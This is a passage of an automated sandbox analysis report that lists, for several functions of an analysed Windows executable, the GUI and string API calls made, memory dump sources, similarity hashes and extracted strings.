                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Append$Window$Visible$CloseCreateCursorDialogForegroundH_prologMessagePopupPostQuitShowValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 1929830641-0
                                                                                                      • Opcode ID: fb1d7030723d5ef5f155b9f4ee05d6c69fd9fa1874a8084e40aae4df75651076
                                                                                                      • Instruction ID: af423b86d9bf7243cc87d119e5dea60076a49070b8f276c6029493fd57c82f12
                                                                                                      • Opcode Fuzzy Hash: fb1d7030723d5ef5f155b9f4ee05d6c69fd9fa1874a8084e40aae4df75651076
                                                                                                      • Instruction Fuzzy Hash: 4951F832704264BEEB112B22EC4AF6F3E69DBC5764F10413FF6196A0E1CA694D40DB19
                                                                                                      Function 00427502 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 324stringwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00427507
                                                                                                      • InterlockedIncrement.KERNEL32(-000000F4), ref: 00427532
                                                                                                      • wsprintfW.USER32 ref: 004275DA
                                                                                                      • lstrlenW.KERNEL32(00000000,000000FF,?,?,?,00000010), ref: 00427676
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000010), ref: 004276A1
                                                                                                      • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,00000010), ref: 004276CB
                                                                                                        • Part of subcall function 00421ECF: __EH_prolog.LIBCMT ref: 00421ED4
                                                                                                        • Part of subcall function 00421ECF: lstrlenW.KERNEL32(00000000,00001000,?,7591E0B0,?,00000000,?,?,0042787E,00000000,?,?,00000000,?,?,00000000), ref: 00421F07
                                                                                                      • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,?,00000010), ref: 004276F7
                                                                                                      • MessageBoxW.USER32(0000000A,?,?,00000003), ref: 004277D0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$H_prolog$IncrementInterlockedMessagewsprintf
                                                                                                      • String ID: %s: %d$0hE$0hE$4AD$list$list_label$list_order$list_text$text_%03d
                                                                                                      • API String ID: 101203759-2156759317
                                                                                                      • Opcode ID: d14a7b1ca5078c6d40f8e7a3c47563984196fc47d2c863627a3968ad857c77c4
                                                                                                      • Instruction ID: dff87e9b3940e85c95b9824c9d0008bd55deb00be2d41abe113388fb65a849ab
                                                                                                      • Opcode Fuzzy Hash: d14a7b1ca5078c6d40f8e7a3c47563984196fc47d2c863627a3968ad857c77c4
                                                                                                      • Instruction Fuzzy Hash: 24C16171D0424DAADF04EBE5C999EEEBBBCAF19308F10016EE115B31C1DB785A44CB69
                                                                                                      Function 00425052 Relevance: 29.8, APIs: 2, Strings: 15, Instructions: 93COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wsprintf
                                                                                                      • String ID: Del$Down$ESC3$F%d$Left$NUM_%d$NUM_*$NUM_+$NUM_,$NUM_-$NUM_.$NUM_/$Right$Space$TAB
                                                                                                      • API String ID: 2111968516-1788754765
                                                                                                      • Opcode ID: f66a46fd12f69995153c1cae6e64894327a738403d8d8ec6a87eacb9d8e3ef1b
                                                                                                      • Instruction ID: fb27a073f83e29f15c1bda8b5e65fb32c354b5abc1bede79b60cea97612c775e
                                                                                                      • Opcode Fuzzy Hash: f66a46fd12f69995153c1cae6e64894327a738403d8d8ec6a87eacb9d8e3ef1b
                                                                                                      • Instruction Fuzzy Hash: E8218311B48F34B64E300524BE92B3E62525626F66BF08513F902D86EAD1FD8CD691CF
                                                                                                      Function 00435209 Relevance: 28.6, APIs: 19, Instructions: 150windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetIconInfo.USER32(?,?), ref: 0043521B
                                                                                                      • GetDC.USER32(00000000), ref: 0043522A
                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0043523C
                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00435242
                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00435269
                                                                                                      • CreateBitmap.GDI32(?,?,?,?,00000000), ref: 0043529A
                                                                                                      • SelectObject.GDI32(?,?), ref: 004352B7
                                                                                                      • SelectObject.GDI32(?,?), ref: 004352C2
                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 004352E6
                                                                                                      • SetPixel.GDI32(?,00000000,?,?), ref: 0043534A
                                                                                                      • SelectObject.GDI32(?,?), ref: 00435370
                                                                                                      • SelectObject.GDI32(?,?), ref: 00435378
                                                                                                      • CreateIconIndirect.USER32(00000001), ref: 0043538B
                                                                                                      • DeleteObject.GDI32(?), ref: 00435396
                                                                                                      • DeleteObject.GDI32(?), ref: 0043539B
                                                                                                      • DeleteObject.GDI32(?), ref: 004353A0
                                                                                                      • DeleteDC.GDI32(?), ref: 004353AB
                                                                                                      • DeleteDC.GDI32(?), ref: 004353B0
                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 004353B7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$Delete$CreateSelect$CompatibleIconPixel$BitmapIndirectInfoRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 4176011905-0
                                                                                                      • Opcode ID: eaea4ba6c47036ab21d483449654682ba20451ed1df99df75e39fb9125468f94
                                                                                                      • Instruction ID: 049c9c6863bca4da748134b191693f4b8ac029bc71d22b5e3f0e0cc1fe1b6ce3
                                                                                                      • Opcode Fuzzy Hash: eaea4ba6c47036ab21d483449654682ba20451ed1df99df75e39fb9125468f94
                                                                                                      • Instruction Fuzzy Hash: 70510271D00218EFDF109FA1DC849AEBFB5FF48351F10902AE911B2260DB759A50EFA4
                                                                                                      Function 0042361D Relevance: 27.2, APIs: 18, Instructions: 160windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnableMenuItem.USER32(?,00000002,?), ref: 0042363A
                                                                                                      • EnableMenuItem.USER32(?,00000003,?), ref: 0042364C
                                                                                                      • CheckMenuItem.USER32(?,00000002,00000001), ref: 00423666
                                                                                                      • CheckMenuItem.USER32(?,00000003,?), ref: 00423677
                                                                                                      • CheckMenuItem.USER32(?,00000004,?), ref: 00423688
                                                                                                      • CheckMenuItem.USER32(?,00000006,?), ref: 00423699
                                                                                                      • CheckMenuItem.USER32(?,0000007A,?), ref: 004236AA
                                                                                                      • CheckMenuItem.USER32(?,00000458,00000001), ref: 004236BE
                                                                                                      • CheckMenuItem.USER32(?,00000459,00000001), ref: 004236D2
                                                                                                      • CheckMenuItem.USER32(?,000007D0,00000001), ref: 004236E8
                                                                                                      • CheckMenuItem.USER32(?,000007D1,00000000), ref: 004236FF
                                                                                                      • CheckMenuItem.USER32(?,000007D2,00000000), ref: 00423717
                                                                                                      • CheckMenuItem.USER32(?,00000BB8,00000001), ref: 0042372B
                                                                                                      • CheckMenuItem.USER32(?,00000BB9,?), ref: 0042373F
                                                                                                      • CheckMenuItem.USER32(?,00000BBA,?), ref: 00423753
                                                                                                      • CheckMenuItem.USER32(?,0000045B,?), ref: 00423767
                                                                                                      • CheckMenuItem.USER32(?,00000FA1,?), ref: 0042377B
                                                                                                      • CheckMenuItem.USER32(?,00000FA2,?), ref: 0042378F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$Check$Enable
                                                                                                      • String ID:
                                                                                                      • API String ID: 2102737033-0
                                                                                                      • Opcode ID: 75e133b10a8a785263c6326ffbafef066f56a6b1b78ff6299dc88cf4ce23a9ea
                                                                                                      • Instruction ID: a3a8db2ca37e9da7af044ad168ded0a6c8c111a20bb44224154e5ffae2ec8d7f
                                                                                                      • Opcode Fuzzy Hash: 75e133b10a8a785263c6326ffbafef066f56a6b1b78ff6299dc88cf4ce23a9ea
                                                                                                      • Instruction Fuzzy Hash: 994129B27F452A7EE7008A78DC83F7A32ECD796A09F00463AB510E71D0D69CDC495B65
                                                                                                      Function 004355CC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 129windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(00000000,ToolbarWindow32,00000000,5600994C,00000000,00000000,000000B4,?,?,00000000,00000000), ref: 00435601
                                                                                                      • GetStockObject.GDI32(00000011), ref: 00435615
                                                                                                      • GetObjectW.GDI32(00000000,0000005C,?), ref: 00435633
                                                                                                      • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 0043565C
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0043567A
                                                                                                      • SendMessageW.USER32(?,00000030,?,00000000), ref: 00435692
                                                                                                      • SendMessageW.USER32(?,0000041E,00000014,00000000), ref: 0043569F
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00100001), ref: 004356AF
                                                                                                      • GetClientRect.USER32(?,?), ref: 004356C3
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,?,?,00000000,00000040), ref: 004356E9
                                                                                                      • GetWindowLongW.USER32(?,000000FC), ref: 00435700
                                                                                                      • SetWindowLongW.USER32(?,000000FC,00435849), ref: 00435717
                                                                                                      • GetWindowLongW.USER32(?,000000FC), ref: 0043571E
                                                                                                      • SetWindowLongW.USER32(?,000000FC,0043580B), ref: 0043572F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long$MessageSend$CreateObject$ClientFontIndirectInfoParametersRectStockSystem
                                                                                                      • String ID: ToolbarWindow32
                                                                                                      • API String ID: 2936060913-4104838417
                                                                                                      • Opcode ID: 3f51542d2a0b2004c8526f9ef05dbcaebad891402990623c3b930f2bb6b1b828
                                                                                                      • Instruction ID: f76f25e1fa694d056b7f7f73ac2d24a184e6b0527aa05ac2f277c84c8476ae4a
                                                                                                      • Opcode Fuzzy Hash: 3f51542d2a0b2004c8526f9ef05dbcaebad891402990623c3b930f2bb6b1b828
                                                                                                      • Instruction Fuzzy Hash: 5D418172900224BFDB509FA5EC89EEB7F78EF48760F115125FA08E61A1D7709904CF94
                                                                                                      Function 004360E5 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 122windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(75A92370,ToolbarWindow32,00000000,00000000,00000000,00000000,000000B4,00000014,00000000,00000000,00000000,00000000), ref: 00436113
                                                                                                      • GetStockObject.GDI32(00000011), ref: 00436127
                                                                                                      • GetObjectW.GDI32(00000000,0000005C,?), ref: 00436145
                                                                                                      • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 0043616E
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0043618A
                                                                                                      • SendMessageW.USER32(00000000,00000030,?,00000000), ref: 004361A2
                                                                                                      • SendMessageW.USER32(00000000,0000041E,00000014,00000000), ref: 004361AF
                                                                                                      • SendMessageW.USER32(00000000,00000420,00000000,00100000), ref: 004361BF
                                                                                                      • GetDlgItem.USER32(00000000,?), ref: 004361CC
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 004361E1
                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 004361EC
                                                                                                      • ScreenToClient.USER32(00000000,00000000), ref: 004361FF
                                                                                                      • ScreenToClient.USER32(00000000,75A92370), ref: 00436208
                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000018,00000000), ref: 0043621E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$ClientCreateObjectScreen$FontIndirectInfoItemParametersRectShowStockSystem
                                                                                                      • String ID: ToolbarWindow32
                                                                                                      • API String ID: 171734827-4104838417
                                                                                                      • Opcode ID: 872a04bb76daadf6eeb8962ea1ced062aef14eece72818880b888df5f63a513b
                                                                                                      • Instruction ID: 92c2e2c1fc3dde78d9c0d2bc275dc0a06e604331f58c1d2c7f24981343337753
                                                                                                      • Opcode Fuzzy Hash: 872a04bb76daadf6eeb8962ea1ced062aef14eece72818880b888df5f63a513b
                                                                                                      • Instruction Fuzzy Hash: D541097690021DBFEF119FA4DC84EEE7B7DEB08344F008426FA14A61A0D771AE149F64
                                                                                                      Function 0042554E Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 178windowstringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00425553
                                                                                                      • SendMessageW.USER32(00001042,00000000,00000000), ref: 0042557E
                                                                                                      • SendMessageW.USER32(?,00001042,00000000,00000000), ref: 00425594
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004255D6
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004255E3
                                                                                                      • SendMessageW.USER32(?,00000148,00000000,?), ref: 004255F2
                                                                                                      • GetWindowTextW.USER32(?,00001000,?), ref: 0042560B
                                                                                                      • GetDlgItemTextW.USER32(?,000003EC,?,00000100), ref: 00425625
                                                                                                      • lstrlenW.KERNEL32(???Text,004442A4,004547B4,00445324,004547B4,?,?,?,00000000,0042904A,?,?,?,0041F4CA,?,?), ref: 00425672
                                                                                                      • IsCharLowerW.USER32(?,004442A4,004547B4,00445324,004547B4,?,?,?,00000000,0042904A,?,?,?,0041F4CA,?,?), ref: 0042569F
                                                                                                      • lstrcpynW.KERNEL32(?,00000000,00000000,00001000,?,?,00000000,0042904A,?,?,?,0041F4CA,?,?), ref: 004256D0
                                                                                                      • SendMessageW.USER32(0000102A,?,00000000,00000000), ref: 004256F1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Text$CharH_prologItemLowerWindowlstrcpynlstrlen
                                                                                                      • String ID: $???Text
                                                                                                      • API String ID: 4001433533-726622928
